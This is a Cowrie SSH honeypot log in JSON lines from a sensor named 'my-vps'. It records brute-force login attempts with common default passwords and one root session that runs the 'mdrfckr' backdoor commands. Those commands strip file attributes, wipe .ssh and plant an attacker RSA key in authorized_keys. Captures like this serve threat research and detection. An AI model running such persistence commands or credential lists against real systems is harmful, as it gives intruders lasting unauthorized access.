{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:43:27.728486Z","src_ip":"185.255.91.51","session":"336afe13a1f8"}
{"eventid":"cowrie.login.failed","username":"webadmin","password":"2025","message":"login attempt [webadmin/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T14:43:28.122414Z","src_ip":"185.255.91.51","session":"336afe13a1f8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:43:29.213801Z","src_ip":"185.255.91.51","session":"336afe13a1f8"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.143.51","src_port":20426,"dst_ip":"1.2.3.4","dst_port":22,"session":"66df1feee9a7","protocol":"ssh","message":"New connection: 101.126.143.51:20426 (1.2.3.4:22) [session: 66df1feee9a7]","sensor":"my-vps","timestamp":"2025-09-08T14:43:35.296007Z"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.143.51","src_port":20442,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e0dde9b89ed","protocol":"ssh","message":"New connection: 101.126.143.51:20442 (1.2.3.4:22) [session: 6e0dde9b89ed]","sensor":"my-vps","timestamp":"2025-09-08T14:43:47.367788Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:43:47.577468Z","src_ip":"101.126.143.51","session":"6e0dde9b89ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59838,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7a3e403b5bd","protocol":"ssh","message":"New connection: 212.227.235.229:59838 (1.2.3.4:22) [session: d7a3e403b5bd]","sensor":"my-vps","timestamp":"2025-09-08T14:44:07.293715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:44:07.294695Z","src_ip":"212.227.235.229","session":"d7a3e403b5bd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:44:07.414832Z","src_ip":"212.227.235.229","session":"d7a3e403b5bd"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"nagios@123","message":"login attempt [nagios/nagios@123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:44:07.935453Z","src_ip":"212.227.235.229","session":"d7a3e403b5bd"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:44:09.060023Z","src_ip":"212.227.235.229","session":"d7a3e403b5bd"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:44:22.071116Z","src_ip":"101.126.143.51","session":"7c6e9f7565fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48483,"dst_ip":"1.2.3.4","dst_port":23,"session":"a6f867437a8b","protocol":"telnet","message":"New connection: 212.227.235.229:48483 (1.2.3.4:23) [session: a6f867437a8b]","sensor":"my-vps","timestamp":"2025-09-08T14:45:02.635148Z"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:45:07.446131Z","src_ip":"101.126.143.51","session":"d345347361f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38210,"dst_ip":"1.2.3.4","dst_port":22,"session":"34cf0e29670d","protocol":"ssh","message":"New connection: 212.227.235.229:38210 (1.2.3.4:22) [session: 34cf0e29670d]","sensor":"my-vps","timestamp":"2025-09-08T14:45:13.615432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:45:13.616079Z","src_ip":"212.227.235.229","session":"34cf0e29670d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:45:13.736779Z","src_ip":"212.227.235.229","session":"34cf0e29670d"}
{"eventid":"cowrie.login.failed","username":"muhamad","password":"abc123","message":"login attempt [muhamad/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:45:14.262246Z","src_ip":"212.227.235.229","session":"34cf0e29670d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:45:15.385555Z","src_ip":"212.227.235.229","session":"34cf0e29670d"}
{"eventid":"cowrie.session.closed","duration":30.63151264190674,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:45:33.266593Z","src_ip":"212.227.235.229","session":"a6f867437a8b"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":35968,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bef6e66504f","protocol":"ssh","message":"New connection: 158.51.124.56:35968 (1.2.3.4:22) [session: 7bef6e66504f]","sensor":"my-vps","timestamp":"2025-09-08T14:45:35.119826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:45:35.120605Z","src_ip":"158.51.124.56","session":"7bef6e66504f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:45:35.259899Z","src_ip":"158.51.124.56","session":"7bef6e66504f"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:45:35.297671Z","src_ip":"101.126.143.51","session":"66df1feee9a7"}
{"eventid":"cowrie.login.success","username":"root","password":"Tester123","message":"login attempt [root/Tester123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:45:35.859324Z","src_ip":"158.51.124.56","session":"7bef6e66504f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:45:36.196305Z","src_ip":"158.51.124.56","session":"7bef6e66504f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:45:36.196978Z","src_ip":"158.51.124.56","session":"7bef6e66504f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:45:36.197711Z","src_ip":"158.51.124.56","session":"7bef6e66504f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:45:36.338027Z","src_ip":"158.51.124.56","session":"7bef6e66504f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:45:36.634712Z","src_ip":"158.51.124.56","session":"7bef6e66504f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:45:36.635575Z","src_ip":"158.51.124.56","session":"7bef6e66504f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:45:36.776844Z","src_ip":"158.51.124.56","session":"7bef6e66504f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:45:36.777626Z","src_ip":"158.51.124.56","session":"7bef6e66504f"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":36542,"dst_ip":"1.2.3.4","dst_port":22,"session":"3769f633399c","protocol":"ssh","message":"New connection: 158.51.124.56:36542 (1.2.3.4:22) [session: 3769f633399c]","sensor":"my-vps","timestamp":"2025-09-08T14:45:36.914299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:45:36.915175Z","src_ip":"158.51.124.56","session":"3769f633399c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:45:37.053261Z","src_ip":"158.51.124.56","session":"3769f633399c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:45:37.647934Z","src_ip":"158.51.124.56","session":"3769f633399c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:45:38.788743Z","src_ip":"158.51.124.56","session":"3769f633399c"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":37400,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b69de4b06fe","protocol":"ssh","message":"New connection: 158.51.124.56:37400 (1.2.3.4:22) [session: 8b69de4b06fe]","sensor":"my-vps","timestamp":"2025-09-08T14:45:38.926812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:45:38.927576Z","src_ip":"158.51.124.56","session":"8b69de4b06fe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:45:39.066686Z","src_ip":"158.51.124.56","session":"8b69de4b06fe"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:45:39.662809Z","src_ip":"158.51.124.56","session":"8b69de4b06fe"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:45:39.803231Z","src_ip":"158.51.124.56","session":"7bef6e66504f"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:45:39.804062Z","src_ip":"158.51.124.56","session":"8b69de4b06fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46710,"dst_ip":"1.2.3.4","dst_port":22,"session":"411dbdf8f09f","protocol":"ssh","message":"New connection: 212.227.235.229:46710 (1.2.3.4:22) [session: 411dbdf8f09f]","sensor":"my-vps","timestamp":"2025-09-08T14:46:22.296077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:46:22.296919Z","src_ip":"212.227.235.229","session":"411dbdf8f09f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:46:22.417421Z","src_ip":"212.227.235.229","session":"411dbdf8f09f"}
{"eventid":"cowrie.login.failed","username":"gaoyuan","password":"Password123","message":"login attempt [gaoyuan/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:46:22.939424Z","src_ip":"212.227.235.229","session":"411dbdf8f09f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:46:24.062160Z","src_ip":"212.227.235.229","session":"411dbdf8f09f"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":56648,"dst_ip":"1.2.3.4","dst_port":22,"session":"6828d2fb10c4","protocol":"ssh","message":"New connection: 185.255.91.51:56648 (1.2.3.4:22) [session: 6828d2fb10c4]","sensor":"my-vps","timestamp":"2025-09-08T14:46:36.590881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:46:36.591809Z","src_ip":"185.255.91.51","session":"6828d2fb10c4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:46:36.686749Z","src_ip":"185.255.91.51","session":"6828d2fb10c4"}
{"eventid":"cowrie.login.failed","username":"master","password":"Welcome1","message":"login attempt [master/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T14:46:37.101374Z","src_ip":"185.255.91.51","session":"6828d2fb10c4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:46:38.198430Z","src_ip":"185.255.91.51","session":"6828d2fb10c4"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":33552,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c376ba58ffa","protocol":"ssh","message":"New connection: 158.51.124.56:33552 (1.2.3.4:22) [session: 9c376ba58ffa]","sensor":"my-vps","timestamp":"2025-09-08T14:46:44.005690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:46:44.006747Z","src_ip":"158.51.124.56","session":"9c376ba58ffa"}
